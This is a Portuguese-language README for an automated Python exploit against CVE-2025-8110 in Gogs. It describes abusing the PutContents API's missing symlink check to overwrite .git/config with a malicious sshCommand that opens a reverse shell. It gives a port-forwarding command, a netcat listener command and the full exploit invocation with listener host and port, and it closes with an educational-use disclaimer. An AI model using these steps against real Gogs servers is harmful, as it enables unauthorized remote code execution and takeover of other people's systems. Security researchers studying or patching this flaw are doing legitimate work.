
Gogs CVE-2025-8110 RCE Exploit
Um exploit automatizado em Python para CVE-2025-8110 no Gogs. Esta vulnerabilidade permite a Execução Remota de Código (RCE) ao abusar da API PutContents, que não valida se um caminho de arquivo é um symlink. Ao sobrescrever o arquivo interno .git/config através de um symlink, podemos injetar um sshCommand malicioso para acionar uma reverse shell.
Certifique-se de ter Python 3 e as dependências necessárias instaladas:
pip install requests rich beautifulsoup4
Você também deve ter o git instalado e acessível no seu $PATH para a fase de clonagem e commit do repositório.
O Gogs pode estar vinculado a 127.0.0.1:3001. Use o redirecionamento de porta para acessar a WebUI localmente:
ssh -L 3001:127.0.0.1:3001 user@target-ip
Após o redirecionamento, navegue até http://localhost:3001:
O script utiliza a API do Gogs para entregar o payload:
Inicie seu listener antes de executar o script, pois o shell é acionado assim que a atualização da API é processada.
nc -lvnp 5555
Passe suas credenciais e o token como argumentos:
python3 exploit.py -u http://localhost:3001 -un <YOUR_USER> -pw <YOUR_PASS> -t <YOUR_TOKEN> -lh <YOUR_IP> -lp 5555
| Flag | Descrição |
|---|---|
-u | A URL base da instância Gogs (ex: http://localhost:3001). |
-un | O nome de usuário da conta que você criou. |
-pw | A senha da conta que você criou. |
-t | O token da API gerado em Configurações. |
-lh | O endereço IP do seu listener (LHOST). |
-lp | A porta do seu listener (LPORT). |
Nota: Se o script travar ou retornar um
Read timed outapós "Overwriting .git/config", verifique seu listener. Isso geralmente indica que a reverse shell se conectou com sucesso e está mantendo a conexão.
Autor: TYehan
Aviso Legal: Esta ferramenta é apenas para fins educacionais e auditoria de segurança autorizada. Use com responsabilidade.